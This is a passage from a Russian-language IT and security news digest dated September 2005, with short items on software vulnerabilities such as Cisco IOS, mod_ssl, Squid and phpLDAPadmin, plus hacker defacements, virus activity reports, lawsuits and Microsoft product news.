эксплойтах или атаках, использующих эту последнюю уязвимость IOS. Cisco предлагает поправку, устраняющую проблему. Обнаруженная в среду уязвимость влияет не на все версии IOS. Более того, она проявляется только в том случае, если используется Firewall Authentication Proxy for FTP and Telnet Sessions. Этот компонент IOS управляет запросами аутентификации в сеансах передачи файлов и telnet. Уязвимы устройства с версиями IOS 12.2ZH и 12.2ZL, 12.3, 12.3T, 12.4 и 12.4T. Чтобы узнать, какая версия IOS работает на данном устройстве, нужно ввести команду show version.
Подробнее

9/09/2005 11:24 Спецслужбы США уже год не могут поймать таинственного кибертеррориста
Спецслужбы США уже около года ведут борьбу с неким хакером, который является высококвалифицированным специалистом и использует свои знания для атак на государственные американские сайты в целях продвижения интересов террористической организации "Аль-Каеда". Об этом накануне сообщила американская газета New York Post со ссылкой на свои источники в правительстве США и вокруг него. Хакер подписывается как Irhabi 007, что в переводе с арабского означает "Террорист 007". Он впервые проявил себя летом 2004 года, когда взломал сайт дорожного управления штата Арканзас. Он изменил внешний вид сайта, заполнив его террористической пропагандой. С тех пор он регулярно проводит подобные акции против различных американских интернет-ресурсов и зачастую именно таким образом в Интернет попадают видеозаписи казни заложников в Ираке и объявления о взятии ответственности за проводимые "Аль-Каедой" теракты. При этом правительственным агентам не удается выследить "Террориста 007" или предотвратить его будущие акции. Спецслужбы считают, что за псевдонимом может скрываться целая группа людей, причем необязательно арабских террористов - это могут быть квалифицированные специалисты из неарабских стран, нанятые "Аль-Каедой".
Lenta.Ru

9/09/2005 10:58 eEye: обнаружены уязвимости в процессе инсталляции IE и Outlook
Компания eEye Digital Security обнаружила слабое звено в стандартном процессе установки Microsoft Internet Explorer, Outlook и Outlook Express. Общий компонент этих приложений подвержен ошибке переполнения буфера, что в свою очередь позволяет злоумышленнику получить дистанционный доступ к системе пользователя, утверждает старший директор по маркетингу продуктов eEye Майк Петербах. eEye, разославшая предупреждение об этой проблеме в конце прошлой недели, отмечает, что она затрагивает системы с Windows XP с Service Pack 0 или 1 и системы Windows 2000. Секьюрити-фирма отмечает, что она все еще изучает проблему и не исключено, что она проявляется и с другими версиями операционной системы. Microsoft не известно о каких-либо атаках с использованием данной уязвимости. После выпуска в прошлом месяце объединенного обновления для браузера IE в нем уже было найдено несколько уязвимостей — от уязвимости версии 6 на Windows XP с Service Pack 2 до уязвимости IE, связанной с файлом Microsoft DDS Library Shape Control. «Я не удивлюсь, если Microsoft в ближайшем будущем выпустит еще одно объединенное обновление для IE», — сказал Петербах. eEye передала Microsoft подробную информацию об обнаруженной уязвимости, но не публикует ее, пока производитель не разработает соответствующую поправку или не выпустит рекомендации. «Microsoft активно изучает эти сообщения, — сказал представитель софтверного гиганта. — По завершении процесса изучения Microsoft примет надлежащие меры, чтобы защитить своих заказчиков». Сейчас eEye готовит 12 рекомендаций по уязвимостям для публикации после того, как поставщики выпустят заплатки или предложат обходные пути. Девять из них относятся к продуктам Microsoft.
Подробности

9/09/2005 10:40 Microsoft начала оспаривать в суде наложенные на нее Европой ограничения
Корпорация Microsoft начала кампанию по оспариванию решения Евросоюза о принуждении ее к изменению торговой практики на территории стран ЕС. Как известно, в результате продолжавшейся с марта 2004 года тяжбы Microsoft была принуждена к раскрытию для европейских разработчиков ряда своих технологий, применяющихся в ОС Windows и изъятию из европейских версий этого продукта программы Windows Media Player. Власти ЕС решили, что Microsoft злоупотребляет почти монопольным положением на рынке, в связи с чем и решили ограничить ее деятельность специальным постановлением Еврокомиссии. Корпорация пыталась обжаловать решение в судах, однако суды ее не поддержали, в связи с чем с 1 июня этого года компания начала выполнять требования ЕС - раскрывать на специальных условиях исходные коды компонентов Windiows для европейских разработчиков и продавать специальную версию Windows XP без встроенного плейера, получившую название Windows XP N. Теперь Microsoft намеревается снова добиваться отмены решения европейских властей и подала новый запрос в суд. Вместе с тем, как сообщает BBC News, юристы полагают, что теперь какое-либо решение по этому вопросу вряд ли стоит ожидать ранее 2007 года.
Подробности

7/09/2005 11:19 Следующая версия GPL защитит свободное ПО от патентных исков?
В будущую версию лицензии General Public License, возможно, войдет пункт о наказании компаний, использующих патенты на программное обеспечение против свободного ПО. Как сообщил во вторник президент европейского отделения организации Free Software Foundation Джордж Грив, версия 3 GPL, проект которой будет опубликован в январе 2006 года, может содержать пункт, направленный против патентов на ПО. Согласно этому пункту, если компания обвинит продукт свободного ПО в нарушении ее патентов, она утрачивает право на распространение этого продукта. Иоахим Джекобс из FSF Europe пояснил, что такой пункт будет относиться только к тем компаниям, которые применяют свои патенты против свободного ПО. «Мы не хотим мешать людям использовать свободное ПО, если они просто оформили патент на программное обеспечение», — сказал он. В GPL может войти также пункт о наказании компаний, которые применяют технологии защиты от копирования. «Мы предпримем что-то для решения этой проблемы, если найдем разумный способ», — сказал Грив. Окончательного решения по поводу включения в GPL 3 пунктов против патентов на ПО и управления цифровыми правами пока нет. «Эти пункты обсуждаются, но мы пока не знаем, включим ли мы их, каким образом и в какой форме, — сообщил Грив. — Даже (автор GPL) Ричард Столлман еще не определился с этим». Ожидается также, что следующая версия GPL обеспечит лучшую совместимость с другими лицензиями свободного ПО и лучшую интернационализацию.
ZDNet

7/09/2005 11:04 Компанию "Авиационные линии Кубани" обвиняют в причинении Microsoft миллионного ущерба
По сведениям Lenta.Ru, прокуратура Краснодарского края возбудила уголовное дело по факту использования нелегальных копий ПО компании Microsoft в российском авиапредприятии "Авиационные линии Кубани".
Подробности

6/09/2005 14:50 Itanium не по зубам Longhorn-серверу
High-end процессор от Intel будет лишь отчасти совместим с операционной системой Microsoft нового поколения. На прошлой неделе Microsoft сообщила, что версия Windows Longhorn Server будет поддерживать процессор Intel Itanium, но только для решения ограниченного числа тяжелых задач. В последние годы Intel продвигает Itanium главным образом в качестве процессора для мощных многопроцессорных серверов — это престижный рынок, но гораздо меньший, чем виделось в начале. Сообщение Microsoft значительно укрепляет такое big-iron-позиционирование процессора. «Longhorn Server для Itanium будет решать не любые задачи», — говорится в заявлении представителя компании. Операционная система нацелена на решение трех специфических типов тяжелых задач: базы данных, специальные задачи и задачи автоматизации бизнес-процессов, такие как бухгалтерский учет и CRM. В число задач, которые операционная система решать не в состоянии, входят «факс-сервер, Windows Media Services, Windows SharePoint Services, службы файлов/печати и др.». Шаг Microsoft — очередная иллюстрация того, что процессору Itanium теперь отводится менее амбициозная роль. Дебют этого семейства был омрачен срывами сроков выпуска, низкой производительностью и несовместимостью программного обеспечения с серверами х86. Многие из этих первоначальных проблем были устранены, но за это время серверы х86 стали гораздо более мощными, и IBM прекратила разработку собственного Itanium-сервера. Однако союзники по Itanium не сдаются и все еще работают над проектами развития рынка Itanium. Объявленная роль Longhorn на Itanium согласуется с планами Microsoft в отношении более ранней серверной операционной системы Windows Server 2003 R2, которая должна выйти в конце этого года и не будет поддерживать Itanium. Функции R2 рассчитаны главным образом на задачи, решаемые менее мощными серверами. Это управление учетными записями и доступом пользователей, серверы уровня отделов и настройка и администрирование систем хранения данных.
ZDNet

6/09/2005 14:38 Digital Security Office 2005
Как сообщает bugtraq.ru, Digital Security выпустила интегрированное решение Digital Security Office 2005, объединяющее новые версии систем анализа и управления информационными рисками ГРИФ и разработки и управления политикой безопасности информационной системы КОНДОР. В новых версиях систем значительно оптимизирован и расширен алгоритм анализа рисков, включены обширные базы угроз и уязвимостей, а также детализированные положения стандарта ISO 17799. Системы содержат модуль управления рисками для наиболее оптимального внедрения контрмер.
Информация о продукте

6/09/2005 13:07 Опасная уязвимость в mod_ssl
Как сообщает Secunia, в модуле Apache mod_ssl (предназначен для обеспечения криптозащищённого обмена по протоколу https с использованием SSL/TLS) обнаружена уязвимость, связанная с ошибкой в обработке параметра "SSLVerifyClient require" при высталенном параметре "SSLVerifyClient require" в файле конфигурации виртуальных хостов Apache (httpd.conf). ПРоведение атаки на уязвимый модуль может позволить клиенту обойти фазу аутентификации при входе на защищённую страницу. О наличии уязвимости стало известно от разработчиков, которыми выпущена обновлённая версия модуля mod_ssl-2.8.24-1.3.33.
Описание

6/09/2005 12:24 Trend Micro выпускает новую версию Housecall Server Edition
Компания Trend Micro объявила о выходе новой версии v6.1 программного продукта Trend Micro Housecall Server Edition, предназначенного для провайдеров услуг и предприятий электронной коммерции. Продукт Trend Micro Housecall Server Edition v6.1 обеспечивает обнаружение и устранение угроз в условиях роста объема онлайновых операций, связанных с банковскими расчетами, электронной коммерцией и другими услугами, которые требуют конфиденциальности. Загружаемый через интернет и не требующий никакого предустановленного ПО, этот инструмент помогает уменьшить риск заражения вирусами, шпионскими программами и программами, записывающими нажатия клавиш, которые позволяют злоумышленникам совершать онлайновые кражи и мошенничества. Новая версия продукта Housecall включает средства для обнаружения и удаления шпионского и рекламного ПО, функция Security Scan позволяет идентифицировать отсутствующие программные «заплаты» и другие уязвимые места, а интерфейс стал более удобным.
Источник

6/09/2005 11:55 МВД продолжает конфисковывать мобильники
МВД вошло во вкус и продолжает конфисковывать мобильные телефоны - на сей раз попытка незаконного ввоза трубок была пресечена в Морском порту Санкт-Петербурга. Как сообщает РИА "Новости" со ссылкой на пресс-службу Федеральной таможенной службе (ФТС) РФ, ориентировочная стоимость изъятого товара составила более 600000 евро. Партия телефонов перевозилась на теплоходе "Бирючки", следовавшем из Финляндии в Санкт-Петербург. В результате операции было обнаружено и конфисковано 767 коробок, в которых содержалось в общей сложности около 5000 телефонов. Мобильники находились в нескольких помещениях теплохода, в частности, в сауне, душевой, сушилке и в помещении для кондиционирования воздуха. Документов на пересечение государственной границы РФ груз не имел, а в бумагах, обнаруженных при досмотре, значились фирмы-получатели, зарегистрированные на территории Москвы и Санкт-Петербурга. Администрация судна признала наличие незаконного груза на борту теплохода. По факту незаконного ввоза сотовых телефонов возбуждено дело об административном правонарушении и решается вопрос о возбуждении уголовного дела. В настоящее время проводится экспертиза контрабандного груза и его оценка.
РИА "Новости"

6/09/2005 11:23 Уязвимость в Squid 2.5
Сообщается о наличии уязвимости в популярном прокси-сервере Squid. Уязвимость связана с некорретной проверкой граничных условий в функции sslConnectTimeout() файла '/squid/src/ssl.c'. Позволяет удалённому атакующему вызвать DoS сервера. Разработчиками выпущен патч для версии 2.5 STABLE.
Патч

6/09/2005 10:56 Пользователей Kazaa заставят соблюдать авторские права
Владельцам популярной файлообменной сети Kazaa, компании Sharman Networks, предписано модифицировать соответствующее программное обеспечение таким образом, чтобы при скачивании файлов пользователи не нарушали авторских прав. Такое решение принял федеральный суд Австралии, в котором с ноября 2004 года длится судебная тяжба между группой крупных медиакомпаний и Sharman Networks, сообщается на сайте телеканала BBC News. Истцами выступили корпорации Universal, EMI, Sony BMG, Warner и австралийская Festival Mushroom. В иске они указали, что сервис Kazaa способствует широкомасштабному нарушению авторских прав. Представители Sharman Networks, в свою очередь, заявили, что они не могут контролировать соблюдение закона об авторском праве при использовании Kazaa, приведя в пример в качестве аналогии ксерокс и магнитофон. Однако, по мнению судьи, владельцы сервиса "давно знают о том, что Kazaa широко используется для обмена файлами, защищенными авторским правом". Более того, сайт Kazaa внушает пользователям мысль о том, что о нарушениях можно не волноваться, отметил судья. Теперь Sharman Networks обязаны за два месяца интегрировать в программное обеспечение, используемое для скачивания файлов, фильтры, которые не позволят нарушать авторские права.
Lenta.Ru

6/09/2005 10:39 Sun отбраковывает лицензии open source
Sun отказалась от лицензии Industry Standards Source License, а OSI призывает последовать ее примеру других. Включившись в движение за уменьшение числа разных лицензий open source, Sun рекомендует больше не использовать свою собственную лицензию этого типа. Директор отделения Sun Open Source Office Саймон Фиппс сообщил, что Sun отказывается от лицензии Sun Industry Standards Source Licence (SISSL), и намекнул, что за ней могут последовать другие. «На самом деле это очень хорошая лицензия, призванная поощрять ветвления и производные разработки, поддерживающие те же форматы файлов и стандарты, что и оригинальная. Однако эта лицензия не применяется в большом количестве проектов, и я не думаю, что будет оправдано держать ее в списке предпочтительных лицензий Sun, — написал Фиппс в своем блоге в пятницу. — Сегодня мы предприняли упреждающий шаг, как я надеюсь, первый из нескольких подобных». Организация Open Source Initiative, которая официально присваивает лицензиям статус лицензии open source, пытается остановить процесс размножения таких лицензий. Слишком большое их число может привести к образованию островов из несовместимого ПО, которое не сочетается друг с другом, и усложнит юридический анализ для тех, кто намеревается использовать проекты open source или принять в них участие. В частности, организация просит компании изымать свои собственные лицензии open source. В марте Intel отменила лицензию Intel Open Source Licence. Отмена SISSL означает, что программное обеспечение OpenOffice.org будет управляться только одной лицензией, LGPL. «Проекты, использующие SISSL по двухлицензионной схеме, такие как OpenOffice.org, перестают подчиняться SISSL, что упростит их схему лицензирования, как только это позволит цикл разработки», — говорится на веб-сайте проекта.
Подробности

6/09/2005 10:18 В центре Екатеринбурга поставят памятник компьютерной клавиатуре
В центре Екатеринбурга на набережной реки Исети будет установлен памятник компьютерной клавиатуре, сообщает в понедельник агентство "Интерфакс". Эта акция будет проведена в рамках фестиваля современного искусства в городской среде "Длинные истории - 3", который будет проходить в городе с 5 по 15 сентября. Участники фестиваля, согласно одобренным организаторами концепциям, распишут несколько городских бетонных заборов, а также проведут "художественное освоение" недавно отстроенной набережной между улицами Малышева и Куйбышева. По данным уральского ИА "Апельсин", установить памятник клавиатуре предложил художник Анатолий Кобылянский (Вяткин), его проект носит название "Клава", в качестве композиционного материала предложен бетон, выбранный, в числе прочего, за свою "вандалостойкость". Как сообщила директор фестиваля Наиля Аллахвердиева, "Все кнопки будут установлены в стандартном порядке, но не впритык, между ними будет травка. На набережной люди сидят на траве, теперь они смогут сидеть на кнопках", - отметила она. В общей сложности длина клавиатуры составит около 12 метров, размер квадратных кнопок составит 30 на 30 сантиметров.
"Интерфакс"

5/09/2005 14:04 DVD Jon взломал защиту Windows Media
Молодой шведский хакер, подаривший прогрессивному человечеству утилиту DeCSS, помогающую взламывать защиту DVD-дисков, добрался и до творения Microsoft. Хакер, как пишет журнал TechSpot, сумел взломать алгоритм, применяемый для упаковки используемых WMP-плеером NSC-файлов. Эти файлы содержат всю информацию о мультимедиа-потоке, включая данные об имени и адресе транслирующего сервера, не зная которых, альтернативная программа просто не сможет открыть нужный WMA-файл. Теперь, когда защита сломана, интернет-вещание в форматах WMA и WMV доступно не только пользователям Windows, но и владельцам компьютеров, работающих под Linux или другими системами на которых установлен альтернативный плеер VideoLAN Client (VLC), также предназначенный для воспроизведения потокового мультимедиа-контента.
Источник

5/09/2005 13:02 Новый виток «виртуальных войн»
Израильские хакеры взломали вчера сайт министерства финансов Иордании. Сейчас главной странице сайта можно видеть фон в виде израильского флага и текст израильского гимна «Атиква». Кроме того, на сайте есть надпись «Hacked By K4H0L4V4N Team». Судя по всему, речь идет о новом витке «виртуальных войн». Прошлая «война» между израильскими хакерами и хакерами из исламских стран произошла в начале «интифады Аль-Акса», когда пострадали десятки сайтов. Затем число взломов пошло на спад, но недавно хакерская группа из Марокко Team-Evil сумела получить доступ к нескольким израильским баннерным сетям и разместить там свои воззвания, в которых говорилось, что это «ответ на ежедневные убийства палестинцев» и что «никто не сможет остановить наши атаки на израильские сайты. Наша следующая цель – сайты, принадлежащие университетам и правительству». Кроме того, было сказано, что за последнее время группе удалось взломать несколько десятков израильских сайтов.
Crime-Research

5/09/2005 12:27 "Невидимки" в реестре
Специалисты компании Secunia обнаружили ошибку обработки больших строк в редакторе реестра Windows, вследствие которой ключи определенной длины утилитой не отображаются. Все впоследствии создаваемые ответвления скрытого ключа также оказываются в таком случае невидимыми. В Secunia подчеркивают, что уязвимость затрагивает в том числе и ключ автозапуска программ при старте Run, которым нередко пользуются вредоносные программы. По сведениям Secunia, брешь присутствует в Windows 2000 и Windows XP, включая XP Service Pack 2 и Windows 2000 Service Pack 4 с самыми последними обновлениями. Как указывают в компании, скрытые ключи можно увидеть при помощи текстовой утилиты reg, запускаемой из командной строки, или посредством программы regedt32.exe, имеющейся в Windows 2000.
Статья в тему

5/09/2005 11:50 Cтатья "Защищаем беспроводную сеть: руководство THG"
На сайте Tom's Guides Publishing LLC опубликована статья, представляющая собой подробное руководство о построении защищённой беспроводной сети (WLAN). Статья будет полезна администраторам и пользователям, занимающимся настройкой и обслуживанием WLAN-сетей.
Cтатья

5/09/2005 11:28 Американец признался в продаже исходных кодов Windows
28-летний американец Уильям П. Дженовиз-младший (William P. Genovese Jr.) признал себя виновным в незаконных продажах фрагментов исходного кода операционных систем Microsoft Windows NT 4.0 и Windows 2000, сообщает сайт News.com. По данным обвинителей, Дженовиз получил в свое распоряжение фрагменты кода в феврале прошлого года от некой третьей стороны, которая распространяла код в интернете без разрешения Microsoft. В дальнейшем Дженовиз, действовавший под никами illwill и xillwillx@yahoo.com, предлагал код на продажу через собственный сайт. Представитель следственной группы Microsoft и агент ФБР под прикрытием скачали себе копии украденных фрагментов кода и отправили электронные платежи Дженовизу между февралем и июлем прошлого года. Дженовизу было предъявлено обвинение в незаконном разглашении коммерческой информации. Судебный вердикт по делу Дженовиза должен быть вынесен осенью. По словам адвоката подсудимого, обвинитель, соблюдая условия судебного соглашения, просит для Дженовиза от 10 до 30 месяцев лишения свободы. Адвокат отметил, что Дженовиз не знает, от кого он сам получил фрагменты исходного кода операционных систем.
Источник

5/09/2005 10:55 Недельный отчет о вирусах и вторжениях Panda Software
На сайте антивирусной компании Panda Software опубликован еженедельный отчёт о вирусной активности и вторжениях. В отчете рассмотрены два троянца Banker.AMQ и Downloader.ENC и две хакерских утилиты 007Spy и KeyMask.
Отчёт

5/09/2005 10:32 Вышло обновление для брандмауэра Windows ХР
Корпорация Microsoft выпустила обновление для брандмауэра операционной системы Windows ХР. Заплатка устраняет ошибку, используя которую злоумышленники могут создать список исключений для межсетевого экрана, не отображающихся в интерфейсе самой программы. Как сообщается в официальном уведомлении, для проведения атаки необходимо получить доступ к реестру операционной системы. Сделать это можно через какую-либо другую уязвимость в Windows или же локально. Далее нужно ввести список исключений брандмауэра в соответствующий раздел реестра ОС. Корпорация Microsoft подчеркивает, что ошибка сама по себе не может применяться с целью получения несанкционированного доступа к машине, и для того, чтобы ей воспользоваться, требуются права администратора. К тому же, как уже отмечалось, разработчики выпустили патч. После установки обновления исключения для брандмауэра, созданные с помощью редактора реестра, отображаются в списке интерфейса межсетевого экрана Windows так же, как если бы они были созданы непосредственно в этом интерфейсе.
Подробности

5/09/2005 10:01 Windows Vista будет «сублимировать» ПК перед исправлением
В следующую версию операционной системы Microsoft Windows войдет новая технология исправлений, которая уменьшит число необходимых перезагрузок и перед каждой перезагрузкой будет сохранять данные пользователя. Технология с кодовым названием Freeze Dry использует новый менеджер перезагрузок из Windows Vista. Microsoft утверждает, что в большинстве случаев при установке или обновлении приложений пользователям не придется перезагружать Windows Vista. Некоторые приложения можно будет обновлять даже в процессе работы. «При следующем запуске приложения Windows Vista автоматически заменит файл», — пояснил представитель Microsoft. Чтобы защитить данные пользователя при перезапуске приложения после установки поправки Windows Vista будет сохранять эти данные, закрывать приложение, устанавливать патч и перезапускать приложение. «В результате пользователю в большинстве случаев не придется вмешиваться в процесс обновления», — утверждает компания. Усовершенствованная технология исправлений особенно полезна в корпоративной среде, где ИТ-менеджеры автоматически устанавливают поправки и обновления на множество машин. Сегодня пользователи, оставившие документы открытыми и несохраненными, при таком автоматическом обновлении системы рискуют потерять свои данные.
Источник

4/09/2005 13:19 Убить Google
Вице-президент Microsoft Стив Боллмер поклялся «убить» интернет-корпорацию Google и «похоронить» ее исполнительного директора Эрика Шмидта. Противостояние между конкурентами достигает опасного напряжения. Руководитель Microsoft поклялся во что бы то ни стало разрушить корпорацию Google, владеющую популярным поисковиком в интернете. Возмущение Боллмера вызвало то, что Google регулярно переманивает к себе менеджеров Microsoft. В июле компания Google перекупила высокопоставленного сотрудника Microsoft Кай-Фу Ли, назначив его куратором научно-исследовательского центра Google в Китае. Microsoft подала иск против Google, чтобы препятствовать переходу Ли к конкурентам. Корпорация Билла Гейтса утверждает, что менеджер нарушил пункт контракта о запрете работать на конкурирующие компании в течение года. Google вину отрицает и объясняет иск Microsoft желанием запугать менеджера и помешать развитию бизнеса интернет-корпорации в Азии. Накануне Microsoft и Google представили новые документы в суд Вашингтона. Microsoft обвинила Кай-Фу Ли в том, что он отправил в Google конфиденциальные документы о стратегии развития китайского подразделения Microsoft еще до того, как был официально нанят конкурентами. Google настаивает на том, что все материалы, переданные Ли, были в открытом доступе. Microsoft также обнародовала сообщение, отправленное по электронной почте от Джонатана Розенберга, директора по коммерческому развитию Google. Юристы корпорации намерены доказать, что Google переманивал к себе Кай-Фу Ли не для реализации китайского проекта, а с целью получить секретную коммерческую информацию. «Будем преследовать его, как волки, – написал Розенберг. – Он может быть полезен во всех отношениях, не только в Китае». Ответ адвокатов Google был резким. Представители интернет-компании представили суду заявление бывшего инженера Microsoft Марка Лаковски. В ноябре 2004 года Лаковски встретился с вице-президентом Microsoft Стивом Боллмером, чтобы объявить о своем решении покинуть компанию и перейти на работу в Google. Лаковски утверждает, что топ-менеджер Microsoft выслушал его, потом встал со своего места, схватил стул и со всей силы швырнул его в стену. На этом выражение эмоций не закончилось. Боллмер начал вспоминать исполнительного директора Google Эрика Шмидта. «Да я, ..., урою этого парня! Похороню его! Я делал это раньше и сделаю еще раз. Я, ..., убью Google!» Такие слова, по уверению Лаковски, прокричал Стив Боллмер.
Подробности

4/09/2005 12:40 Сайт Минобороны Украины взломали хакеры
Сайт Минобороны Украины взломали хакеры. Как тут не вспомнить американских аналитиков, которые приравняли утечку секретных данных к ядерному удару. Взломать сайт украинского военного ведомства, а еще и оставить на главной странице сообщение типа "Гриценко (министр обороны - Прим. авт.), не спи!" для профессионала, оказывается, не так уж и сложно. Причиной, способствующей этому ЧП, явилось то, что на сайте Минобороны обнаружена "SQL - уязвимость". Суть ее заключается в том, что входящие данные или не проверяются совсем, или же эта проверка происходит неправильно. Эксперты также отметили, что возможен не только взлом самого сайта Минобороны Украины, но и редактирование его баз данных извне, также как и их полное уничтожение. Самое интересное, что администраторы сайта были предупреждены о возможной угрозе специалистами украинской фирмы "Ukrainian PHP Group", специализирующейся на информационных технологиях.
Подробности

4/09/2005 12:08 В phpLDAPadmin обнаружена критическая уязвимость
В программе phpLDAPadmin 0.9.6 — 0.9.7/alpha5 обнаружена уязвимость. Степень опасности расценивается специалистами как критическая, сообщает SecurityLab. Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS-нападение и выполнить произвольный PHP-сценарий на целевой системе с привилегиями веб-сервера. Уязвимость позволяет удаленному пользователю с помощью специально сформированного URL выполнить произвольный PHP-сценарий на целевой системе с привилегиями веб-сервера. Удаленный пользователь может просмотреть произвольные файлы на системе с помощью символов обхода каталога. Удаленный пользователь может также выполнить произвольный HTML-сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Способов устранения уязвимости в настоящее время не существует.
Источник

4/09/2005 11:49 Стоимость интернета в России снизится в 10 раз
С первого сентября 2005 года в России начнется плавное снижение цен на интернет: ожидается, что в течение двух лет трафик подешевеет примерно в десять раз. Во многом это связано с тем, что универсальный оператор связи "Корбина Телеком" увеличил пропускную способность московской магистральной сети до 10 Гбит/с. Первое снижение цен планируется произвести с первого сентября 2005 года: в «Корбине Телеком» уже утверждены новые тарифы на интернет. В среднем стоимость трафика снизится на 14%. По словам представителей «Корбина Телеком», компания не остановится на достигнутом и благодаря расширенному каналу связи будет дальше снижать цены. «Высокая стоимость интернет-трафика является препятствием для распространения IP-технологий, предназначенных, прежде всего, для передачи аудио- и видеоинформации, — отмечает Александр Малис, вице-президент „Корбины Телеком“. — Поэтому наша компания считает нужным работать над существенным снижением тарифов на доступ в интернет для своих абонентов. Увеличив скорость передачи данных, мы значительно увеличим и трафик, за счет чего станет возможным значительное уменьшение его стоимости. На данный момент средняя стоимость клиентского трафика в Москве составляет $10–20 за ГБайт. Но уже в ближайшие два года мы надеемся довести реальную стоимость трафика для абонентов до $1–3 за ГБайт».Корбина Телеком» объявила об увеличении скорости передачи данных в московской магистральной сети до 10 Гбит/с благодаря внедрению операторского оборудования от компании Cisco. Расширение канала обошлось компании приблизительно в $1 млн. Таким образом, теперь «Корбина Телеком» обладает одной из крупнейших высокоскоростных сетей передачи данных в Москве: почти у всех провайдеров пропускная способность не более 1 Гбит/с. Исключение составляют МГТС с 10 Гбит/с для связи между узлами и несколько узлов «Транстелекома».
Источник

4/09/2005 11:16 Linspire 5.0 бесплатно до 6 сентября.
Linspire 5.0 доступна для свободной загрузки, сообщает linux.org.ru. Команда разработчиков этого дистрибутива предлагает ознакомится с данным дистрибутивом, в основе которого лежит Debian. Стоимость цифровой копии составляет 49.95$. Для бесплатной загрузки необходимо ввести код `freespire', который дает право на скидку в размере 49.95$, то есть на всю стоимость дистрибутива.
Подробности

4/09/2005 10:39 Интернет-мошенники пытаются нажиться на последствиях "Катрины"
В Интернете начали появляться сайты, занимающиеся выманиванием денежных средств у пользователей Интернета под предлогом помощи жителям США, пострадавшим от урагана "Катрина", пишет газета Washington Post. Также зафиксированы спамерские рассылки, эксплуатирующие эту тему. Мошенники регистрируют доменные имена, содержащие англоязычные фразы типа "помощь жертвам Катрины", "Катрина - это наше цунами", "пожертвования Катрины" и подобные. На аукционе eBay были даже зафиксированы случаи торговли подобными именами с ремаркой о том, что собранные средства якобы направляются американскому "Красному кресту". Администрация сервиса подобные лоты блокирует. В своих текстах мошенники часто прикрываются названиями известных благотворительных организаций, приводя собственные, не имеющие к ним отношения, платежные реквизиты, как правило, в наиболее распространенной в США платежной системе PayPal. Подобная практика стала обычной для различного рода интернет-злоумышленников, которые пытаются использовать почти любое резонансное событие для введения в заблуждение пользователей с целью злоупотребления их интересом к той или иной актуальной теме. Регулярно появляются почтовые вирусы, например, с ложными сообщениями о "поимке Осамы бин Ладена", целью которых является убедить получателя открыть исполняемый файл, чтобы заразить его компьютер. Предыдущий крупный всплеск активности интернет-мошенников во всем мире фиксировался после прошлогоднего цунами в Индийском океане, тема которого, как выясняется, эксплуатируется и в связи с американским ураганом.
Источник

3/09/2005 16:47 Обзор вирусной активности за август 2005
"Лаборатория Касперского" опубликовала итоги вирусной активности за прошедший месяц. Уже который месяц подряд за вершину вирусной двадцатки борются NetSky.q и Mytob.c. Это совершенно разные черви, созданные с разницей в один год и использующие разные уязвимости. NetSky.q вел войну против червей семейства Mydoom и Bagle и, судя по текущим показателям, вышел из этой схватки победителем. Но вот Mytob, в основе которого лежат исходные коды самого первого Mydoom, оказался достойным преемником прародителя. Несомненно, схватка между червями семейств Mytob и NetSky – это наиболее заметная тенденция в наших ежемесячных вирусных отчетах. 13 позиций из 20 – это Mytob. 4 из 20 – это NetSky. Однако, если посмотреть на первую десятку, то там наблюдается практически паритет – 4 Mytob и 3 NetSky. Июльское наступление на двадцатку со стороны «старых» червей – Zafi, Bagle, Mydoom - практически провалилось. В августе в рейтинге не осталось ни одного варианта Bagle или Mydoom, а два червя Zafi всего лишь сохранили достигнутые позиции. Зато Mytob-ы смогли вернуть себе показатели июня из-за того, что все три новичка двадцатки – это именно очередные модификации Mytob.
Подробности

3/09/2005 13:41 Microsoft обновила MSN Toolbar
Компания Microsoft внесла два добавления в инструментальную панель MSN Toolbar, одно из которых позволяет уберечь пользователей от атак сетевых мошенников. Второе исправление, как пишет NewsFactor, облегчает доступ пользователям MSN Toolbar к игровому сайту MSN. Что касается антифишерского исправления, то теперь панель самостоятельно сканирует страницы, посещаемые пользователем, и не дает ему вводить личные данные на сайтах, засветившихся на мошеннических операциях. Если же подозрительный сайт пока не фигурирует в списке подтвержденных фишеров, то MSN Toolbar просто предупреждает пользователя о возможных неприятных последствиях. Кроме того, пользователь и сам может отправить запрос, чтобы сверить URL непонравившегося ему сайта с черным списком, лежащем на одном из серверов сети MSN.
Источник

3/09/2005 12:37 Скоро Microsoft позволит звонить с ПК на мобильный телефон
Корпорация Microsoft готовится запустить систему, которая позволит компьютерным пользователям совершать звонки на обычные телефоны со своих компьютеров. Билл Гейтс расширил присутствие своей компании на быстрорастущем рынке интернет-телефонии, купив одну из ведущих компаний этого сектора Teleo. Microsoft и его основные конкуренты в лице AOL, Google и Yahoo сейчас предоставляют пользователям возможность совершать телефонные звонки между компьютерами. Однако звонить на стационарные или мобильные телефоны с компьютеров пока нельзя. В свою очередь, технология Teleo позволяет как совершать звонки с компьютеров на телефоны, так и отвечать на них. В настоящее время компания Yahoo также занимается подготовкой к запуску подобной системы: два месяца назад она приобрела компанию Dialpad, занимающуюся интернет-телефонией. Microsoft сейчас использует технологию Voice over Internet Protocol (VoIP) в ряде своих продуктов, включая систему обмена сообщениями в режиме реального времени. Корпорация заявила, что планирует включить телефонную технологию Teleo в эту систему. Microsoft надеется, что эта цель будет достигнута до конца года.
Источник

3/09/2005 12:15 Windows XP SP3?
На сайте TheHotfix.net собрана подборка патчей для Windows XP SP2, вышедших после выпуска этого самого SP2. Почему-то авторы назвали это чудо SP3. Включает также Internet Explorer 7, Windows Media Player 10, Windows Media Center Update "Emerald". Судя по всему, применимо только для русской версии ОС. Однако, существует подобное счастье и для русской версии. За что отедльное спасибо держателю сайта Mihas.Net. Как пишет сам автор: "Подумал я тут на досуге, а как же пользователи с русской Windows XP, без обновлений останутся, жалко ведь их. И сделал такой же Update Pack для Windows XP русскоязычной и обозвал его версией 1.0. Скажу честно, основа была взята с немецкого пака. Мой полный перевод, адаптация и скачивание всех обновлений с сайта Microsoft для русской Windows XP. Так что качайте и устанавливайте. Единственное но, проверить работу программы я не смог, потому как не имею русского Windows а на мой немецкий эти обновления уже установлены, и даже если бы и не были установлены, то русскоязычные файлы на немецкий Windows не встанут". Так что желающие могут качать и наслаждаться.
XP SP3
XP Update pack 1.0

3/09/2005 11:58 "Локатор" от МТС определит местоположение абонентов
